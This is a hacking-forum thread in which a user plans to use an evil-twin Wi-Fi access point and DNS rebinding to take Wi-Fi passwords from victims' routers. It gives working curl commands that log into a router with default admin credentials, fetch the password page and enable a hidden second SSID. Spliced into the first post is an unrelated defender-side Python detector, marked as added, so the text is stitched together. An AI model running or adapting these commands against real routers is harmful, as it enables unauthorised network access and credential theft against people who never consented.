Sinisterly
how can i perform dns rebinding using evil twin in local level ?! - Printable Version



how can i perform dns rebinding using evil twin in local level ?! - mooooon - 04-12-2019

as the title says i want to perform this attack https://sinister.ly/Thread-DNS-Rebinding-Attack

using evil twin on local level

the curl command to login into the router
Code:
curl "http://192.168.1.1/" --data "frashnum=&action=login&Frm_Logintoken=25&Username=admin&Password=admin"

the curl command to get the page that contains the wifi password
Code:
curl -v -X GET "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_t.gch" -o 565.html

this is how i was planning to perform the attack
evil twinning a wifi using fluxion or whatever .... when the user opens the captive portal sign in network page (that has dns rebinding scripts in it) is detected we stop the ddos ... the user auto connects to his wifi then the page refreshes and executes the dns rebinding attack to get the wifi password from his router ....

but now i don't know how i will get the html file back if i want to use it in local level only so the other option was
to enable the second ssid that will launch with the default password so i can just login without getting anything back
but i tried the curl command and it didn't work

Code:
curl "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_wlan_essid_t.gch" -H "Origin: http://192.168.1.1" -H "Upgrade-Insecure-Requests: 1" -H "DNT: 1" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" -H "Referer: http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_wlan_essid_t.gch^&IF_VIEWID=IGD.LD1.WLAN2" --data "IF_ERRORSTR=SUCC^&IF_ERRORPARAM=SUCC^&IF_ERRORTYPE=-1^&IF_CONFIGTAG=Y^&IF_ACTION=apply^&WLAN_INSTNUM=4^&WLAN_SSID0=IGD.LD1.WLAN1^&WLAN_SSID1=IGD.LD1.WLAN2^&WLAN_SSID2=IGD.LD1.WLAN3^&WLAN_SSID3=IGD.LD1.WLAN4^&IF_SSIDATTR1=0^&IF_SSIDATTR2=0^&IF_SSIDATTR3=0^&IF_SSIDATTR4=0^&IF_VIEWID=IGD.LD1.WLAN2^&SettingStatus=CurruntSetting^&CardIsIn=1^&MaxInterface=4^&DeviceMode=InfrastructureAccessPoint^&CardMode=b^%^2Cg^%^2Cn^%^2Cbg^%^2Cgn^%^2Cbgn^&CardRev=0^&Class=255^&PID=33169^&VID=4332^&ValidIf=1^&Enable=1^&RadioStatus=NULL^&Standard=NULL^&BeaconInterval=NULL^&RtsCts=NULL^&Fragment=NULL^&DTIM=NULL^&TxPower=NULL^&CountryCode=NULL^&TxRate=NULL^&Channel=NULL^&ESSID=12345^&ESSIDPrefix=NULL^&ACLPolicy=NULL^&BeaconType=NULL^&WEPAuthMode=NULL^&WEPEncryptionLevel=NULL^&WEPKeyIndex=NULL^&WPAAuthMode=NULL^&WPAEncryptType=NULL^&WPAGroupRekey=NULL^&WPAEAPServerIp=NULL^&RadiusPort=NULL^&RadiusServerPort=NULL^&WPAEAPSecret=NULL^&PossibleChannels=NULL^&BasicDataRates=NULL^&OpDataRates=NULL^&PossibleTxRates=NULL^&OOBAccessEnabled=NULL^&BeaconEnabled=NULL^&ESSIDHideEnable=1^&RegulatoryDomain=NULL^&WlanMode=NULL^&DistanceFromRoot=NULL^&PeerBSSID=NULL^&AuthServiceMode=NULL^&QosType=NULL^&Priority=1^&UAPSDEnabled=NULL^&AutoChannelEnabled=NULL^&ChannelsInUse=NULL^&11iAuthMode=NULL^&11iEncryptType=NULL^&MaxUserNum=32^&SSIDIsolationEnable=NULL^&VapIsolationEnable=0^&Band=2.4G^&11nMode=1^&BandWidth=20Mhz^&SideBand=Lower^&11nRate=Auto^&SGIEnabled=0^&GreenField=0^&WdsMode=WDS_Disable^&Tx2Path=1^&IsPublicWiFiInterface=NULL^&MasterAuthServerIp=0.0.0.0^&
MasterAuthServerPort=0^&MasterAuthServerSecret=^&Name=wlan0^&RealRF=1^&ChannelInUsed=8^&TxRateInUsed=Auto^&Bssid=54^%^3Abe^%^3A53^%^3A6a^%^3Af6^%^3Ac0^&IfStatus=Up^&UAPSDSupported=1^&WMMSupported=1^&TotalAssociations=4^&TotalBytesSent=2246220234^&TotalBytesReceived=3268409714^&TotalPacketsSent=22743088^&TotalPacketsReceived=14280169^&ErrorsSent=3057^&ErrorsReceived=0^&NonUnicastPacketsReceived=0^&UnicastPacketsSent=97163073747419137^&UnicastPacketsReceived=61100857587924993^&DiscardPacketsSent=8137^&DiscardPacketsReceived=68^&TotalPSKFailures=66^&TotalIntegrityFailures=6^&NumEasyPair=0^&ConnectStatus=Disconnected^&SingalQuality=0^&SingalStrength=0^&_SESSION_TOKEN=2714922195119803" --compressed

cause it needs to check a checkbox as i think

more about this problem
https://www.sitepoint.com/community/t/how-can-i-check-a-checkbox-using-curl-in-a-router-page-ask-question/325785

edit: i got the command working by removing every ^ from it

what do you think folks ?
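
Added example, not part of the original post: a defender-side sketch of the two checks that stop the rebinding step described above. find_rebinding flags external names that resolve to internal addresses in resolver logs, and host_allowed is the Host-header allowlist a router admin page can enforce. The log tuple format, LOCAL_SUFFIXES, ALLOWED_HOSTS and the sample records are assumptions constructed for illustration.

```python
import ipaddress

# Assumptions for illustration: local DNS suffixes and the Host values
# the router admin UI answers to. Adjust to the real network.
LOCAL_SUFFIXES = (".lan", ".home.arpa")
ALLOWED_HOSTS = {"192.168.1.1", "router.lan"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def find_rebinding(records):
    """records: (timestamp, qname, answer_ip) tuples from a resolver log.
    Returns sorted (name, reason) pairs for names that look rebound."""
    seen_public, findings = set(), {}
    for _ts, qname, ip in sorted(records):
        name = qname.rstrip(".").lower()
        if name.endswith(LOCAL_SUFFIXES):
            continue  # local names may legitimately map to internal IPs
        if not is_internal(ip):
            seen_public.add(name)
        elif name in seen_public:
            findings[name] = "public-to-internal flip"
        else:
            findings.setdefault(name, "internal answer for external name")
    return sorted(findings.items())

def host_allowed(host_header):
    """Host allowlist for the admin UI (IPv4 or hostname, optional port)."""
    host = host_header.strip().lower().split(":")[0]
    return host in ALLOWED_HOSTS

# Constructed sample resolver log (not captured traffic).
SAMPLE_LOG = [
    (100, "portal.example.net.", "203.0.113.10"),
    (102, "portal.example.net.", "192.168.1.1"),
    (105, "cdn.example.org.", "198.51.100.7"),
    (110, "router.lan.", "192.168.1.1"),
    (120, "intranet.example.com.", "10.0.0.5"),
]

if __name__ == "__main__":
    for name, reason in find_rebinding(SAMPLE_LOG):
        print(name, "->", reason)
    print(host_allowed("192.168.1.1:80"), host_allowed("portal.example.net"))
```

A request that reaches the admin page through a rebound name still carries that name in its Host header, which is why the allowlist rejects it even though the destination IP is correct.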


RE: how can i perform dns rebinding using evil twin in local level ?! - darkninja1980 - 04-27-2019

please edit your code, it's hard to read.


RE: how can i perform dns rebinding using evil twin in local level ?! - mooooon - 04-28-2019

(04-27-2019, 08:41 PM)darkninja1980 Wrote: please edit your code, it's hard to read.

No need to edit it .... it works as it is.

I posted in these sites too
https://forum.antichat.ru/threads/470085/
http://www.kali-linux.fr/forum/index.php/topic,6237.0.html


RE: how can i perform dns rebinding using evil twin in local level ?! - Drako - 04-28-2019

That post is 5 years old... The code and the attack could be outdated.


RE: how can i perform dns rebinding using evil twin in local level ?! - darkninja1980 - 04-28-2019

(04-28-2019, 05:15 PM)mooooon Wrote:
(04-27-2019, 08:41 PM)darkninja1980 Wrote: please edit your code, it's hard to read.

No need to edit it .... it works as it is.

I posted in these sites too
https://forum.antichat.ru/threads/470085/
http://www.kali-linux.fr/forum/index.php/topic,6237.0.html

what I mean is like this for an example.
Code:
using System;

namespace SampleApp {
   public delegate string MyDel(string str);
    
   class EventProgram {
      event MyDel MyEvent;
        
      public EventProgram() {
         this.MyEvent += new MyDel(this.WelcomeUser);
      }
      public string WelcomeUser(string username) {
         return "Welcome " + username;
      }
      static void Main(string[] args) {
         EventProgram obj1 = new EventProgram();
         string result = obj1.MyEvent("Tutorials Point");
         Console.WriteLine(result);
      }
   }
}



RE: how can i perform dns rebinding using evil twin in local level ?! - mooooon - 05-23-2019

(04-28-2019, 06:31 PM)darkninja1980 Wrote:
(04-28-2019, 05:15 PM)mooooon Wrote:
(04-27-2019, 08:41 PM)darkninja1980 Wrote: please edit your code, it's hard to read.

No need to edit it .... it works as it is.

I posted in these sites too
https://forum.antichat.ru/threads/470085/
http://www.kali-linux.fr/forum/index.php/topic,6237.0.html

what I mean is like this for an example.
Code:
using System;

namespace SampleApp {
  public delegate string MyDel(string str);

  class EventProgram {
     event MyDel MyEvent;

     public EventProgram() {
        this.MyEvent += new MyDel(this.WelcomeUser);
     }
     public string WelcomeUser(string username) {
        return "Welcome " + username;
     }
     static void Main(string[] args) {
        EventProgram obj1 = new EventProgram();
        string result = obj1.MyEvent("Tutorials Point");
        Console.WriteLine(result);
     }
  }
}

here is it


Code:
curl "http://192.168.1.1/getpage.gch?pid=1002&nextpage=net_wlan_essid_t.gch" -H "Origin: http://192.168.1.1" -H "Upgrade-Insecure-Requests: 1" -H "DNT: 1" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" -H "Referer: http://192.168.1.1/getpage.gch?pid=1002&nextpage=net_wlan_essid_t.gch&IF_VIEWID=IGD.LD1.WLAN2" --data "IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&IF_CONFIGTAG=Y&IF_ACTION=apply&WLAN_INSTNUM=4&WLAN_SSID0=IGD.LD1.WLAN1&WLAN_SSID1=IGD.LD1.WLAN2&WLAN_SSID2=IGD.LD1.WLAN3&WLAN_SSID3=IGD.LD1.WLAN4&IF_SSIDATTR1=0&IF_SSIDATTR2=0&IF_SSIDATTR3=0&IF_SSIDATTR4=0&IF_VIEWID=IGD.LD1.WLAN2&SettingStatus=CurruntSetting&CardIsIn=1&MaxInterface=4&DeviceMode=InfrastructureAccessPoint&CardMode=b%2Cg%2Cn%2Cbg%2Cgn%2Cbgn&CardRev=0&Class=255&PID=33169&VID=4332&ValidIf=1&Enable=1&RadioStatus=NULL&Standard=NULL&BeaconInterval=NULL&RtsCts=NULL&Fragment=NULL&DTIM=NULL&TxPower=NULL&CountryCode=NULL&TxRate=NULL&Channel=NULL&ESSID=12345&ESSIDPrefix=NULL&ACLPolicy=NULL&BeaconType=NULL&WEPAuthMode=NULL&WEPEncryptionLevel=NULL&WEPKeyIndex=NULL&WPAAuthMode=NULL&WPAEncryptType=NULL&WPAGroupRekey=NULL&WPAEAPServerIp=NULL&RadiusPort=NULL&RadiusServerPort=NULL&WPAEAPSecret=NULL&PossibleChannels=NULL&BasicDataRates=NULL&OpDataRates=NULL&PossibleTxRates=NULL&OOBAccessEnabled=NULL&BeaconEnabled=NULL&ESSIDHideEnable=1&RegulatoryDomain=NULL&WlanMode=NULL&DistanceFromRoot=NULL&PeerBSSID=NULL&AuthServiceMode=NULL&QosType=NULL&Priority=1&UAPSDEnabled=NULL&AutoChannelEnabled=NULL&ChannelsInUse=NULL&11iAuthMode=NULL&11iEncryptType=NULL&MaxUserNum=32&SSIDIsolationEnable=NULL&VapIsolationEnable=0&Band=2.4G&11nMode=1&BandWidth=20Mhz&SideBand=Lower&11nRate=Auto&SGIEnabled=0&GreenField=0&WdsMode=WDS_Disable&Tx2Path=1&IsPublicWiFiInterface=NULL&MasterAuthServerIp=0.0.0.0&MasterAuthServerPort=0&MasterAuthServerSecret=&Name=wlan0&RealRF=1&ChannelInUsed=8&TxRateInUsed=
Auto&Bssid=54%3Abe%3A53%3A6a%3Af6%3Ac0&IfStatus=Up&UAPSDSupported=1&WMMSupported=1&TotalAssociations=4&TotalBytesSent=2246220234&TotalBytesReceived=3268409714&TotalPacketsSent=22743088&TotalPacketsReceived=14280169&ErrorsSent=3057&ErrorsReceived=0&NonUnicastPacketsReceived=0&UnicastPacketsSent=97163073747419137&UnicastPacketsReceived=61100857587924993&DiscardPacketsSent=8137&DiscardPacketsReceived=68&TotalPSKFailures=66&TotalIntegrityFailures=6&NumEasyPair=0&ConnectStatus=Disconnected&SingalQuality=0&SingalStrength=0&_SESSION_TOKEN=5598383297501123"


and i can't edit it as it's a curl command !!

and if you mean the other code that looks like yours that @Ligeti wrote .... i don't understand it clearly so i can't edit it !


RE: how can i perform dns rebinding using evil twin in local level ?! - mooooon - 05-23-2019

(04-28-2019, 05:22 PM)Drako Wrote: That post is 5 years old... The code and the attack could be outdated.

so what do you suggest ?!


RE: how can i perform dns rebinding using evil twin in local level ?! - mooooon - 05-24-2019

(04-28-2019, 05:22 PM)Drako Wrote: That post is 5 years old... The code and the attack could be outdated.

i have tested it and all i am getting is this

[Image: 60776781_1068062006716938_27346587245042...e=5D5CD42E]


[Image: 61006550_446110716205177_189747256661272...e=5D6A81F8]

and when i blocked my ip just like the article

i got this [Image: 61514836_293071584934378_828548238206933...e=5D5F429C]

any ideas ??


RE: how can i perform dns rebinding using evil twin in local level ?! - Drako - 05-24-2019

(05-24-2019, 03:58 AM)mooooon Wrote:
(04-28-2019, 05:22 PM)Drako Wrote: That post is 5 years old... The code and the attack could be outdated.

i have tested it and all i am getting is this

[Image: 60776781_1068062006716938_27346587245042...e=5D5CD42E]


[Image: 61006550_446110716205177_189747256661272...e=5D6A81F8]

and when i blocked my ip just like the article

i got this [Image: 61514836_293071584934378_828548238206933...e=5D5F429C]

any ideas ??

Well like I said, the code is probably way outdated. I can't really suggest anything there.


RE: how can i perform dns rebinding using evil twin in local level ?! - mooooon - 05-24-2019

(05-24-2019, 04:17 AM)Drako Wrote:
(05-24-2019, 03:58 AM)mooooon Wrote:
(04-28-2019, 05:22 PM)Drako Wrote: That post is 5 years old... The code and the attack could be outdated.

i have tested it and all i am getting is this

[Image: 60776781_1068062006716938_27346587245042...e=5D5CD42E]


[Image: 61006550_446110716205177_189747256661272...e=5D6A81F8]

and when i blocked my ip just like the article

i got this [Image: 61514836_293071584934378_828548238206933...e=5D5F429C]

any ideas ??

Well like I said, the code is probably way outdated. I can't really suggest anything there.

what should i do now